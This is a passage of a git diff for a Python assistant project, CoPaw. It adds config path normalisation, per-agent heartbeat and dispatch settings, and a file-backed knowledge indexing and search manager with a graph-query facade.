os.readlink("/etc/localtime") + if "zoneinfo/" in link: + return link.split("zoneinfo/", 1)[1] + except OSError: + pass + + return "UTC" diff --git a/src/copaw/config/utils.py b/src/copaw/config/utils.py index e2fb3fe97..76cbb3ae6 100644 --- a/src/copaw/config/utils.py +++ b/src/copaw/config/utils.py @@ -6,6 +6,7 @@ import plistlib import subprocess import sys +from datetime import UTC, datetime from pathlib import Path from typing import Optional, Tuple @@ -17,7 +18,50 @@ RUNNING_IN_CONTAINER, WORKING_DIR, ) -from .config import Config, HeartbeatConfig, LastApiConfig, LastDispatchConfig +from .config import ( + Config, + HeartbeatConfig, + LastApiConfig, + LastDispatchConfig, + load_agent_config, + save_agent_config, +) + + +def _normalize_working_dir_bound_paths(data: object) -> object: + """Normalize legacy ~/.copaw-bound paths to current WORKING_DIR. + + This keeps COPAW_WORKING_DIR effective even if user config files contain + older hard-coded paths like "~/.copaw/media" or + "/Users/x/.copaw/workspaces/...". + Only rewrites known working-dir-bound keys. + """ + legacy_root_tilde = "~/.copaw" + legacy_root_abs = str(Path(legacy_root_tilde).expanduser().resolve()) + new_root_abs = str(WORKING_DIR) + + def _rewrite_path_value(v: object) -> object: + if not isinstance(v, str) or not v: + return v + if v.startswith(legacy_root_tilde): + return new_root_abs + v[len(legacy_root_tilde) :] + if v.startswith(legacy_root_abs): + return new_root_abs + v[len(legacy_root_abs) :] + return v + + def _walk(obj: object, key: str | None = None) -> object: + if isinstance(obj, dict): + out: dict = {} + for k, v in obj.items(): + out[k] = _walk(v, str(k)) + return out + if isinstance(obj, list): + return [_walk(x, key) for x in obj] + if key in {"workspace_dir", "media_dir"}: + return _rewrite_path_value(obj) + return obj + + return _walk(data, None) def _discover_system_chromium_path() -> Optional[str]: @@ -336,6 +380,7 @@ def load_config(config_path: Optional[Path] = None) -> Config: return Config() with open(config_path, "r", encoding="utf-8") as file: data = json.load(file) + data = _normalize_working_dir_bound_paths(data) # Backward compat: top-level last_api_host / last_api_port -> last_api if "last_api_host" in data or "last_api_port" in data: la = data.setdefault("last_api", {}) @@ -343,6 +388,10 @@ def load_config(config_path: Optional[Path] = None) -> Config: la["host"] = data.get("last_api_host") if "port" not in la and "last_api_port" in data: la["port"] = data.get("last_api_port") + # Backward compat: knowledge.engine object -> literal enum string + knowledge = data.get("knowledge") + if isinstance(knowledge, dict) and isinstance(knowledge.get("engine"), dict): + knowledge["engine"] = "local_lexical" return Config.model_validate(data) @@ -360,20 +409,66 @@ def save_config(config: Config, config_path: Optional[Path] = None) -> None: ) -def get_heartbeat_config() -> HeartbeatConfig: - """Return effective heartbeat config (from file or default 30m/main).""" +def get_heartbeat_config(agent_id: Optional[str] = None) -> HeartbeatConfig: + """Return effective heartbeat config (from agent config or default). + + Args: + agent_id: Agent ID to load config from. If None, tries to load from + root config.agents.defaults (legacy behavior). + + Returns: + HeartbeatConfig: Heartbeat configuration or default. + """ + if agent_id is not None: + try: + agent_config = load_agent_config(agent_id) + hb = agent_config.heartbeat + return hb if hb is not None else HeartbeatConfig() + except Exception: + return HeartbeatConfig() + + # Legacy: try to load from root config config = load_config() + if config.agents.defaults is None: + return HeartbeatConfig() hb = config.agents.defaults.heartbeat return hb if hb is not None else HeartbeatConfig() -def update_last_dispatch(channel: str, user_id: str, session_id: str) -> None: - """Persist last user-reply dispatch target (user send+reply only).""" +def update_last_dispatch( + channel: str, + user_id: str, + session_id: str, + agent_id: Optional[str] = None, +) -> None: + """Persist last user-reply dispatch target (user send+reply only). + + Args: + channel: Channel name + user_id: User ID + session_id: Session ID + agent_id: Agent ID to update. If None, updates root config (legacy). + """ + if agent_id is not None: + try: + agent_config = load_agent_config(agent_id) + agent_config.last_dispatch = LastDispatchConfig( + channel=channel, + user_id=user_id, + session_id=session_id, + ) + save_agent_config(agent_id, agent_config) + return + except Exception: + pass + + # Legacy: update root config config = load_config() config.last_dispatch = LastDispatchConfig( channel=channel, user_id=user_id, session_id=session_id, + dispatched_at=datetime.now(UTC).isoformat(), ) save_config(config) diff --git a/src/copaw/constant.py b/src/copaw/constant.py index f0c566cbe..9750d7e33 100644 --- a/src/copaw/constant.py +++ b/src/copaw/constant.py @@ -79,6 +79,9 @@ def get_str(env_var: str, default: str = "") -> str: .resolve() ) +# Default media directory for channels (cross-platform) +DEFAULT_MEDIA_DIR = WORKING_DIR / "media" + JOBS_FILE = EnvVarLoader.get_str("COPAW_JOBS_FILE", "jobs.json") CHATS_FILE = EnvVarLoader.get_str("COPAW_CHATS_FILE", "chats.json") @@ -95,6 +98,13 @@ def get_str(env_var: str, default: str = "") -> str: HEARTBEAT_DEFAULT_TARGET = "main" HEARTBEAT_TARGET_LAST = "last" +# Debug history file for /dump_history and /load_history commands +DEBUG_HISTORY_FILE = EnvVarLoader.get_str( + "COPAW_DEBUG_HISTORY_FILE", + "debug_history.jsonl", +) +MAX_LOAD_HISTORY_COUNT = 10000 + # Env key for app log level (used by CLI and app load for reload child). LOG_LEVEL_ENV = "COPAW_LOG_LEVEL" @@ -135,13 +145,13 @@ def get_str(env_var: str, default: str = "") -> str: # Local models directory MODELS_DIR = WORKING_DIR / "models" -# Memory compaction configuration MEMORY_COMPACT_KEEP_RECENT = EnvVarLoader.get_int( "COPAW_MEMORY_COMPACT_KEEP_RECENT", 3, min_value=0, ) +# Memory compaction configuration MEMORY_COMPACT_RATIO = EnvVarLoader.get_float( "COPAW_MEMORY_COMPACT_RATIO", 0.7, diff --git a/src/copaw/knowledge/__init__.py b/src/copaw/knowledge/__init__.py new file mode 100644 index 000000000..18c5b5780 --- /dev/null +++ b/src/copaw/knowledge/__init__.py @@ -0,0 +1,6 @@ +# -*- coding: utf-8 -*- + +from .manager import KnowledgeManager +from .graph_ops import GraphOpsManager + +__all__ = ["KnowledgeManager", "GraphOpsManager"] \ No newline at end of file diff --git a/src/copaw/knowledge/graph_ops.py b/src/copaw/knowledge/graph_ops.py new file mode 100644 index 000000000..2d11517d2 --- /dev/null +++ b/src/copaw/knowledge/graph_ops.py @@ -0,0 +1,191 @@ +# -*- coding: utf-8 -*- +"""Bridge layer for graph-oriented knowledge operations. + +This module provides a lightweight manager used by graph tools. It keeps +current MVP behavior compatible with the local lexical engine. +""" + +from __future__ import annotations + +import json +import uuid +from dataclasses import dataclass +from datetime import UTC, datetime +from pathlib import Path +from typing import Any + +from ..config.config import KnowledgeConfig +from ..constant import WORKING_DIR +from .manager import KnowledgeManager + + +@dataclass +class GraphOpsResult: + records: list[dict[str, Any]] + summary: str + provenance: dict[str, Any] + warnings: list[str] + + +class GraphOpsManager: + """Graph operation facade for tool-layer usage.""" + + def __init__(self, working_dir: Path | str = WORKING_DIR) -> None: + self.working_dir = Path(working_dir) + self.knowledge_root = self.working_dir / "knowledge" + self.memify_jobs_path = self.knowledge_root / "memify-jobs.json" + + def graph_query( + self, + *, + config: KnowledgeConfig, + query_mode: str, + query_text: str, + dataset_scope: list[str] | None, + top_k: int, + timeout_sec: int, + ) -> GraphOpsResult: + """Run graph-like query over current knowledge backend. + + For MVP local engine, template mode is mapped to existing lexical + retrieval and normalized into graph-like records. + """ + _ = timeout_sec + engine = getattr(config, "engine", "local_lexical") + warnings: list[str] = [] + + if query_mode == "cypher": + return GraphOpsResult( + records=[], + summary="Cypher mode is not available on local_lexical engine.", + provenance={"engine": engine, "dataset_scope": dataset_scope or []}, + warnings=["CYPHER_UNAVAILABLE_ON_LOCAL_ENGINE"], + ) + + manager = KnowledgeManager(self.working_dir) + search_result = manager.search( + query=query_text, + config=config, + limit=max(1, min(top_k, 50)), + ) + records: list[dict[str, Any]] = [] + for hit in search_result.get("hits") or []: + snippet = (hit.get("snippet") or "").strip() + if not snippet: + continue + records.append( + { + "subject": hit.get("source_name") or hit.get("source_id") or "unknown", + "predicate": "mentions", + "object": snippet, + "score": float(hit.get("score", 0) or 0), + "source_id": hit.get("source_id"), + "source_type": hit.get("source_type"), + "document_path": hit.get("document_path"), + "document_title": hit.get("document_title"), + } + ) + + if not records: + warnings.append("NO_GRAPH_RECORDS") + + return GraphOpsResult( + records=records, + summary=f"Returned {len(records)} graph-like records.", + provenance={ + "engine": engine, + "dataset_scope": dataset_scope or [], + "query_mode": query_mode, + }, + warnings=warnings, + ) + + def run_memify( + self, + *, + config: KnowledgeConfig, + pipeline_type: str, + dataset_scope: list[str] | None, + idempotency_key: str, + dry_run: bool, + ) -> dict[str, Any]: + """Create a memify job record. + + The local lexical engine stores a no-op success job so tool contracts + and job observability can be validated for MVP flows. + """ + jobs = self._load_memify_jobs() + + normalized_key = (idempotency_key or "").strip() + if normalized_key: + existing = next( + ( + item + for item in jobs.values() + if item.get("idempotency_key") == normalized_key + ), + None, + ) + if existing is not None: + return { + "accepted": False, + "job_id": existing["job_id"], + "status_url": f"/knowledge/memify/jobs/{existing['job_id']}", + "reason": "IDEMPOTENT_REUSE", + } + + job_id = uuid.uuid4().hex[:12] + now = datetime.now(UTC).isoformat() + engine = getattr(config, "engine", "local_lexical") + + status = "succeeded" + error = None + warnings = ["LOCAL_ENGINE_MEMIFY_NOOP"] + + job_payload = { + "job_id": job_id, + "pipeline_type": pipeline_type, + "dataset_scope": dataset_scope or [], + "idempotency_key": normalized_key, + "dry_run": bool(dry_run), + "status": status, + "progress": 100 if status == "succeeded" else 0, + "estimated_steps": 1, + "started_at": now, + "finished_at": now, + "error": error, + "warnings": warnings, + "engine": engine, + "updated_at": now, + } + jobs[job_id] = job_payload + self._save_memify_jobs(jobs) + + return { + "accepted": True, + "job_id": job_id, + "estimated_steps": 1, + "status_url": f"/knowledge/memify/jobs/{job_id}", + } + + def get_memify_status(self, job_id: str) -> dict[str, Any] | None: + jobs = self._load_memify_jobs() + return jobs.get(job_id) + + def _load_memify_jobs(self) -> dict[str, dict[str, Any]]: + if not self.memify_jobs_path.exists(): + return {} + try: + payload = json.loads(self.memify_jobs_path.read_text(encoding="utf-8")) + except Exception: + return {} + if not isinstance(payload, dict): + return {} + return {str(key): value for key, value in payload.items() if isinstance(value, dict)} + + def _save_memify_jobs(self, jobs: dict[str, dict[str, Any]]) -> None: + self.knowledge_root.mkdir(parents=True, exist_ok=True) + self.memify_jobs_path.write_text( + json.dumps(jobs, ensure_ascii=False, indent=2), + encoding="utf-8", + ) \ No newline at end of file diff --git a/src/copaw/knowledge/manager.py b/src/copaw/knowledge/manager.py new file mode 100644 index 000000000..b3e7c6586 --- /dev/null +++ b/src/copaw/knowledge/manager.py @@ -0,0 +1,2457 @@ +# -*- coding: utf-8 -*- +"""File-backed knowledge source indexing and search.""" + +from __future__ import annotations + +import fnmatch +import hashlib +import json +import logging +import re +import shutil +from collections import Counter +from datetime import UTC, datetime, timedelta +from html import unescape +from pathlib import Path +from typing import Any +from urllib.parse import urlparse, parse_qs + +import httpx + +try: + import jieba # type: ignore[import-not-found] +except Exception: # pragma: no cover - optional dependency + jieba = None + +try: + import hanlp # type: ignore[import-not-found] +except Exception: # pragma: no cover - optional dependency + hanlp = None + +from ..constant import CHATS_FILE +from ..config.config import KnowledgeConfig, KnowledgeSourceSpec + +_UNSAFE_FILENAME_RE = re.compile(r'[\\/:*?"<>|]') +_CHAT_URL_RE = re.compile( + r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()+,;=%-]+", + re.IGNORECASE, +) +_URL_TRAILING_STRIP_CHARS = ".,;:!?)]}\"'`*,。!?;:、)】》〉」』" + +# URL exclusion helpers +_URL_SENSITIVE_PARAMS = frozenset({ + "access_token", "token", "api_key", "apikey", "apitoken", + "secret", "password", "auth", "key", "webhook_token", + "sign", "signature", "hmac", +}) +_PRIVATE_HOST_RE = re.compile( + r"^(" + r"localhost" + r"|127(?:\.\d{1,3}){3}" + r"|0\.0\.0\.0" + r"|10(?:\.\d{1,3}){3}" + r"|172\.(?:1[6-9]|2\d|3[01])(?:\.\d{1,3}){2}" + r"|192\.168(?:\.\d{1,3}){2}" + r"|::1" + r"|\[::1\]" + r")$", + re.IGNORECASE, +) +_TITLE_WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9_-]{2,}|[\u4e00-\u9fff]{2,}") +_TITLE_SENTENCE_SPLIT_RE = re.compile(r"(?<=[。!?.!?])\s+|[\n\r]+") +_TITLE_STOP_WORDS = { + "the", + "and", + "for", + "with", + "this", + "that", + "from", + "into", + "chat", + "auto", + "source", + "message", + "messages", + "knowledge", + "data", + "content", + "session", + "用户", + "助手", + "自动", + "来源", + "消息", + "内容", + "知识", + "数据", +} +_SEMANTIC_TOKEN_RE = re.compile(r"[A-Za-z][A-Za-z0-9_-]{2,}|[\u4e00-\u9fff]{2,}") +_SEMANTIC_STOP_WORDS = { + *_TITLE_STOP_WORDS, + "is", + "are", + "was", + "were", + "be", + "to", + "of", + "in", + "on", + "at", + "by", + "or", + "as", + "it", + "an", + "a", + "关键词", + "关键", + "词", +} +_KEYWORD_DEFAULT_TOP_N = 3 +_TEXTUAL_CONTENT_TYPE_MARKERS = ( + "text/", + "application/json", + "application/xml", + "application/xhtml+xml", + "application/javascript", + "application/x-javascript", + "application/ld+json", +) + +logger = logging.getLogger(__name__) +_AUTO_COLLECT_URL_MIN_CONTENT_CHARS = 1000 + + +def _sanitize_filename(name: str) -> str: + return _UNSAFE_FILENAME_RE.sub("--", name) + + +class KnowledgeManager: + """Manage knowledge source indexing within the CoPaw working directory.""" + + def __init__(self, working_dir: str | Path): + self.working_dir = Path(working_dir).expanduser().resolve() + self.root_dir = self.working_dir / "knowledge" + self.sources_dir = self.root_dir / "sources" + self.catalog_path = self.root_dir / "catalog.json" + self.uploads_dir = self.root_dir / "uploads" + self.backfill_state_path = self.root_dir / "history-backfill-state.json" + self.backfill_progress_path = self.root_dir / "history-backfill-progress.json" + self.remote_dir = self.uploads_dir / "remote" + self.remote_blob_dir = self.remote_dir / "blobs" + self.remote_meta_dir = self.remote_dir / "url-meta" + legacy_index_dir = self.root_dir / "indexes" + if legacy_index_dir.exists(): + shutil.rmtree(legacy_index_dir, ignore_errors=True) + self.sources_dir.mkdir(parents=True, exist_ok=True) + self.uploads_dir.mkdir(parents=True, exist_ok=True) + self.remote_blob_dir.mkdir(parents=True, exist_ok=True) + self.remote_meta_dir.mkdir(parents=True, exist_ok=True) + + def list_sources(self, config: KnowledgeConfig) -> list[dict[str, Any]]: + """Return configured sources with index metadata when available.""" + results: list[dict[str, Any]] = [] + for source in config.sources: + payload = source.model_dump(mode="json") + processed = self._process_source_knowledge(source, config) + payload["subject"] = processed.get("subject") or source.name + payload["summary"] = processed.get("summary") or source.summary + payload["keywords"] = processed.get("keywords") or [] + payload["status"] = self.get_source_status(source.id, source) + results.append(payload) + return results + + def normalize_source_name( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> KnowledgeSourceSpec: + """Return a source with auto-generated name derived from its content/location.""" + return self._source_with_auto_name(source, config) + + def get_source_status( + self, + source_id: str, + source: KnowledgeSourceSpec | None = None, + ) -> dict[str, Any]: + """Return persisted index metadata for a source.""" + source_index_path = self._source_index_path(source_id) + if not source_index_path.exists(): + status = { + "indexed": False, + "indexed_at": None, + "document_count": 0, + "chunk_count": 0, + "error": None, + } + if source is not None: + status.update(self._remote_source_status(source)) + return status + + payload = self._load_json(source_index_path) + status = { + "indexed": True, + "indexed_at": payload.get("indexed_at"), + "document_count": payload.get("document_count", 0), + "chunk_count": payload.get("chunk_count", 0), + "error": payload.get("error"), + } + if source is not None: + status.update(self._remote_source_status(source)) + return status + + def index_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Index a single source into chunked JSON files.""" + documents = self._load_documents(source, config) + chunks = self._chunk_documents( + documents, + self._resolve_chunk_size(config, running_config), + ) + payload = { + "source": source.model_dump(mode="json"), + "indexed_at": datetime.now(UTC).isoformat(), + "document_count": len(documents), + "chunk_count": len(chunks), + "error": None, + "chunks": chunks, + } + self._write_source_storage(source, payload, documents) + return { + "source_id": source.id, + "document_count": len(documents), + "chunk_count": len(chunks), + "indexed_at": payload["indexed_at"], + } + + def index_all( + self, + config: KnowledgeConfig, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Index all enabled sources.""" + results = [] + for source in config.sources: + if not source.enabled: + continue + results.append(self.index_source(source, config, running_config)) + return { + "indexed_sources": len(results), + "results": results, + } + + def delete_index(self, source_id: str) -> None: + """Delete persisted index for a source.""" + source_dir = self._source_dir(source_id) + if source_dir.exists(): + shutil.rmtree(source_dir, ignore_errors=True) + + def clear_knowledge(self, config: KnowledgeConfig, *, remove_sources: bool = True) -> dict[str, Any]: + """Clear persisted knowledge data and optionally reset configured sources.""" + source_count = len(config.sources) + cleared_indexes = 0 + if self.sources_dir.exists(): + cleared_indexes = len(list(self.sources_dir.glob("*/index.json"))) + + if self.root_dir.exists(): + shutil.rmtree(self.root_dir, ignore_errors=True) + + # Recreate expected directory structure after cleanup. + self.sources_dir.mkdir(parents=True, exist_ok=True) + self.uploads_dir.mkdir(parents=True, exist_ok=True) + self.remote_blob_dir.mkdir(parents=True, exist_ok=True) + self.remote_meta_dir.mkdir(parents=True, exist_ok=True) + + if remove_sources: + config.sources = [] + + return { + "cleared": True, + "cleared_indexes": cleared_indexes, + "cleared_sources": source_count if remove_sources else 0, + "removed_source_configs": bool(remove_sources), + } + + def search( + self, + query: str, + config: KnowledgeConfig, + limit: int = 10, + source_ids: list[str] | None = None, + source_types: list[str] | None = None, + ) -> dict[str, Any]: + """Search indexed chunks with a lightweight lexical scorer.""" + source_map = {source.id: source for source in config.sources} + terms = [term for term in re.findall(r"\w+", query.lower()) if term] + if not terms: + return {"query": query, "hits": []} + + hits: list[dict[str, Any]] = [] + for source in config.sources: + if source_ids and source.id not in source_ids: + continue + if source_types and source.type not in source_types: + continue + payload = self._load_index_payload(source.id) + if payload is None: + continue + for chunk in payload.get("chunks", []): + score = self._score_chunk(chunk.get("text", ""), terms) + if score <= 0: + continue + hits.append( + { + "source_id": source.id, + "source_name": source_map[source.id].name, + "source_type": source.type, + "document_path": chunk.get("document_path"), + "document_title": chunk.get("document_title"), + "score": score, + "snippet": self._build_snippet( + chunk.get("text", ""), + terms, + ), + }, + ) + + hits.sort(key=lambda item: item["score"], reverse=True) + return {"query": query, "hits": hits[:limit]} + + def get_source_documents(self, source_id: str) -> dict[str, Any]: + """Return the indexed documents for a source, merged by document path.""" + payload = self._load_index_payload(source_id) + if payload is None: + return {"indexed": False, "documents": []} + chunks = payload.get("chunks", []) + # Merge chunks back into per-document text blocks + docs: dict[str, dict[str, Any]] = {} + for chunk in chunks: + doc_path = chunk.get("document_path") or source_id + if doc_path not in docs: + docs[doc_path] = { + "path": doc_path, + "title": chunk.get("document_title") or doc_path, + "text": [], + } + docs[doc_path]["text"].append(chunk.get("text", "")) + documents = [ + { + "path": d["path"], + "title": d["title"], + "text": "\n\n".join(d["text"]), + } + for d in docs.values() + ] + return { + "indexed": True, + "indexed_at": payload.get("indexed_at"), + "document_count": payload.get("document_count", len(documents)), + "chunk_count": payload.get("chunk_count", len(chunks)), + "documents": documents, + } + + def _source_dir(self, source_id: str) -> Path: + return self.sources_dir / self._safe_name(source_id) + + def _source_index_path(self, source_id: str) -> Path: + return self._source_dir(source_id) / "index.json" + + def _source_content_md_path(self, source_id: str) -> Path: + return self._source_dir(source_id) / "content.md" + + def get_source_storage_dir(self, source_id: str) -> Path: + return self._source_dir(source_id) + + def list_sources_from_storage(self) -> list[KnowledgeSourceSpec]: + """Rebuild source specs from persisted v2 storage layout.""" + sources: list[KnowledgeSourceSpec] = [] + for index_path in sorted(self.sources_dir.glob("*/index.json")): + try: + payload = self._load_json(index_path) + source_payload = payload.get("source") + if not isinstance(source_payload, dict): + continue + source = KnowledgeSourceSpec.model_validate(source_payload) + sources.append(source) + except Exception: + logger.warning( + "Failed to read source spec from storage index: %s", + index_path, + ) + return sources + + def _load_index_payload(self, source_id: str) -> dict[str, Any] | None: + source_index_path = self._source_index_path(source_id) + if source_index_path.exists(): + return self._load_json(source_index_path) + return None + + def _write_source_storage( + self, + source: KnowledgeSourceSpec, + payload: dict[str, Any], + documents: list[dict[str, str]], + ) -> None: + source_dir = self._source_dir(source.id) + source_dir.mkdir(parents=True, exist_ok=True) + (source_dir / "raw").mkdir(parents=True, exist_ok=True) + (source_dir / "media").mkdir(parents=True, exist_ok=True) + + self._source_index_path(source.id).write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + self._source_content_md_path(source.id).write_text( + self._build_source_markdown(source, documents), + encoding="utf-8", + ) + self._sync_raw_source_assets(source) + self._update_catalog_entry(source, payload) + + def _update_catalog_entry( + self, + source: KnowledgeSourceSpec, + payload: dict[str, Any], + ) -> None: + catalog: dict[str, Any] = { + "version": 2, + "updated_at": datetime.now(UTC).isoformat(), + "sources": {}, + } + if self.catalog_path.exists(): + try: + current = self._load_json(self.catalog_path) + if isinstance(current, dict): + catalog.update(current) + if not isinstance(catalog.get("sources"), dict): + catalog["sources"] = {} + except Exception: + logger.warning("Failed to read knowledge catalog, recreating") + + catalog["updated_at"] = datetime.now(UTC).isoformat() + catalog["sources"][source.id] = { + "id": source.id, + "name": source.name, + "type": source.type, + "indexed_at": payload.get("indexed_at"), + "document_count": payload.get("document_count", 0), + "chunk_count": payload.get("chunk_count", 0), + "path": str(self._source_dir(source.id)), + } + + self.catalog_path.write_text( + json.dumps(catalog, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + def _build_source_markdown( + self, + source: KnowledgeSourceSpec, + documents: list[dict[str, str]], + ) -> str: + lines = [ + f"# {source.name}", + "", + "## Metadata", + "", + f"- id: {source.id}", + f"- type: {source.type}", + f"- location: {source.location or '-'}", + f"- updated_at: {datetime.now(UTC).isoformat()}", + "", + "## Documents", + "", + ] + if not documents: + lines.append("(no documents)") + lines.append("") + return "\n".join(lines) + + for doc in documents: + title = self._truncate_title(doc.get("title", "document"), max_len=200) + path = doc.get("path", "") + text = doc.get("text", "").strip() + lines.extend( + [ + f"### {title}", + "", + f"- path: {path}", + "", + text if text else "(empty)", + "", + ], + ) + return "\n".join(lines) + + def _sync_raw_source_assets(self, source: KnowledgeSourceSpec) -> None: + raw_root = self._source_dir(source.id) / "raw" + media_root = self._source_dir(source.id) / "media" + + if source.type not in {"file", "directory"}: + return + if not source.location: + return + + source_path = Path(source.location).expanduser() + if not source_path.exists(): + return + + if source.type == "file" and source_path.is_file(): + target_file = raw_root / source_path.name + try: + shutil.copy2(source_path, target_file) + self._write_media_semantic_if_needed(target_file, media_root) + except Exception: + logger.warning("Failed to sync raw file for source %s", source.id) + return + + if source.type == "directory" and source_path.is_dir(): + target_dir = raw_root / source_path.name + if target_dir.exists(): + shutil.rmtree(target_dir, ignore_errors=True) + try: + shutil.copytree(source_path, target_dir, dirs_exist_ok=True) + for file_path in target_dir.rglob("*"): + if file_path.is_file(): + self._write_media_semantic_if_needed(file_path, media_root) + except Exception: + logger.warning("Failed to sync raw directory for source %s", source.id) + + def _write_media_semantic_if_needed(self, file_path: Path, media_root: Path) -> None: + suffix = file_path.suffix.lower() + media_kind = None + if suffix in {".png", ".jpg", ".jpeg", ".gif", ".webp", ".bmp", ".svg"}: + media_kind = "image" + elif suffix in {".mp3", ".wav", ".m4a", ".flac", ".ogg"}: + media_kind = "audio" + elif suffix in {".mp4", ".mov", ".avi", ".mkv", ".webm"}: + media_kind = "video" + if media_kind is None: + return + + semantic_name = f"{self._safe_name(file_path.stem)}.semantic.md" + semantic_path = media_root / semantic_name + size = file_path.stat().st_size if file_path.exists() else 0 + semantic_path.write_text( + "\n".join( + [ + f"# {file_path.name}", + "", + "## Semantic Summary", + "", + "(placeholder) Semantic extraction is not generated yet.", + "", + "## Metadata", + "", + f"- kind: {media_kind}", + f"- original_file: {file_path.as_posix()}", + f"- size_bytes: {size}", + ], + ), + encoding="utf-8", + ) + + @staticmethod + def _load_json(path: Path) -> dict[str, Any]: + return json.loads(path.read_text(encoding="utf-8")) + + def _load_documents( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + ) -> list[dict[str, str]]: + if source.type == "file": + path = Path(source.location).expanduser().resolve() + return [self._read_file_document(path, config)] + if source.type == "directory": + return self._read_directory_documents(Path(source.location), source, config) + if source.type == "url": + if source.content and source.content.strip(): + return [ + { + "path": source.location or source.id, + "title": source.name, + "text": self._normalize_text(source.content), + } + ] + return [self._read_url_document(source.location)] + if source.type == "chat": + if source.location and source.location.strip(): + return self._read_single_chat_document(source.location.strip()) + return self._read_chat_documents() + text_content = source.content.strip() + if not text_content and source.location.strip(): + text_content = Path(source.location).expanduser().read_text( + encoding="utf-8", + ) + return [ + { + "path": source.location or source.id, + "title": source.name, + "text": self._normalize_text(text_content), + }, + ] + + def _read_directory_documents( + self, + directory: Path, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + ) -> list[dict[str, str]]: + root = directory.expanduser().resolve() + if not root.exists() or not root.is_dir(): + raise FileNotFoundError(f"Knowledge directory not found: {root}") + + pattern = "**/*" if source.recursive else "*" + documents: list[dict[str, str]] = [] + for path in root.glob(pattern): + if not path.is_file(): + continue + relative = path.relative_to(root).as_posix() + if not self._is_allowed_path(relative, config): + continue + documents.append(self._read_file_document(path, config)) + return documents + + def save_uploaded_file(self, source_id: str, filename: str, data: bytes) -> Path: + """Persist an uploaded file and return its saved path.""" + safe_source = self._safe_name(source_id) + safe_name = self._safe_name(Path(filename).name) + target_dir = self.uploads_dir / "files" / safe_source + if target_dir.exists(): + shutil.rmtree(target_dir, ignore_errors=True) + target_dir.mkdir(parents=True, exist_ok=True) + target_path = target_dir / safe_name + target_path.write_bytes(data) + return target_path + + def save_uploaded_directory( + self, + source_id: str, + files: list[tuple[str, bytes]], + ) -> Path: + """Persist an uploaded directory snapshot and return its root path.""" + safe_source = self._safe_name(source_id) + target_dir = self.uploads_dir / "directories" / safe_source + if target_dir.exists(): + shutil.rmtree(target_dir, ignore_errors=True) + target_dir.mkdir(parents=True, exist_ok=True) + + for relative_path, data in files: + normalized = Path(relative_path) + safe_parts = [self._safe_name(part) for part in normalized.parts if part not in {"", "."}] + if not safe_parts: + continue + file_path = target_dir.joinpath(*safe_parts) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_bytes(data) + return target_dir + + def _read_chat_documents(self) -> list[dict[str, str]]: + """Build documents from persisted chat registry and session files.""" + chats_path = self.working_dir / CHATS_FILE + if not chats_path.exists(): + return [] + payload = json.loads(chats_path.read_text(encoding="utf-8")) + chats = payload.get("chats", []) + documents: list[dict[str, str]] = [] + sessions_dir = self.working_dir / "sessions" + for chat in chats: + session_id = chat.get("session_id", "") + user_id = chat.get("user_id", "") + session_path = sessions_dir / self._session_filename(session_id, user_id) + collected_text = "" + if session_path.exists(): + state = json.loads(session_path.read_text(encoding="utf-8")) + collected_text = self._extract_visible_chat_text(state) + text = self._normalize_text( + "\n".join( + part + for part in [ + chat.get("name", ""), + chat.get("channel", ""), + session_id, + collected_text, + ] + if part + ), + ) + if not text: + continue + documents.append( + { + "path": str(session_path), + "title": chat.get("name") or session_id or "chat", + "text": text, + }, + ) + return documents + + def _read_single_chat_document(self, session_id: str) -> list[dict[str, str]]: + """Load a single chat session by session_id and return it as one text document.""" + chats_path = self.working_dir / CHATS_FILE + sessions_dir = self.working_dir / "sessions" + chat_meta: dict[str, Any] = {} + + # Try to find matching chat metadata from registry + if chats_path.exists(): + try: + payload = json.loads(chats_path.read_text(encoding="utf-8")) + for chat in payload.get("chats", []): + if chat.get("session_id", "") == session_id: + chat_meta = chat + break + except Exception: + pass + + user_id = chat_meta.get("user_id", "") + chat_name = chat_meta.get("name", "") or session_id + + # Try known session filename patterns + candidates: list[Path] = [] + if user_id: + candidates.append(sessions_dir / self._session_filename(session_id, user_id)) + candidates.append(sessions_dir / self._session_filename(session_id, "")) + # Glob fallback: any file ending with the sanitized session_id + safe_sid = _sanitize_filename(session_id) + candidates.extend(sessions_dir.glob(f"*_{safe_sid}.json") if sessions_dir.exists() else []) + candidates.extend(sessions_dir.glob(f"{safe_sid}.json") if sessions_dir.exists() else []) + + session_path: Path | None = None + for candidate in candidates: + if candidate.exists(): + session_path = candidate + break + + if session_path is None: + raise FileNotFoundError( + f"Session file not found for session_id: {session_id}" + ) + + state = json.loads(session_path.read_text(encoding="utf-8")) + collected_text = self._extract_visible_chat_text(state) + text = self._normalize_text(collected_text) + if not text: + raise ValueError(f"No visible text found in session: {session_id}") + + return [ + { + "path": str(session_path), + "title": chat_name, + "text": text, + } + ] + + def auto_collect_from_messages( + self, + config: KnowledgeConfig, + session_id: str, + user_id: str, + request_messages: list[Any] | None, + response_messages: list[Any] | None = None, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Backward-compatible wrapper for turn-based auto collection.""" + user_stage = self.auto_collect_user_message_assets( + config=config, + session_id=session_id, + user_id=user_id, + request_messages=request_messages, + running_config=running_config, + ) + text_stage = self.auto_collect_turn_text_pair( + config=config, + session_id=session_id, + user_id=user_id, + request_messages=request_messages, + response_messages=response_messages, + running_config=running_config, + ) + return { + "changed": bool(user_stage.get("changed") or text_stage.get("changed")), + "file_sources": int(user_stage.get("file_sources", 0) or 0), + "url_sources": int(user_stage.get("url_sources", 0) or 0), + "text_sources": int(text_stage.get("text_sources", 0) or 0), + "failed_sources": int(user_stage.get("failed_sources", 0) or 0) + + int(text_stage.get("failed_sources", 0) or 0), + "errors": [ + *(user_stage.get("errors") or []), + *(text_stage.get("errors") or []), + ], + } + + def auto_collect_user_message_assets( + self, + config: KnowledgeConfig, + session_id: str, + user_id: str, + request_messages: list[Any] | None, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Collect file/url knowledge immediately from user-sent content.""" + if not config.enabled or not bool( + getattr(running_config, 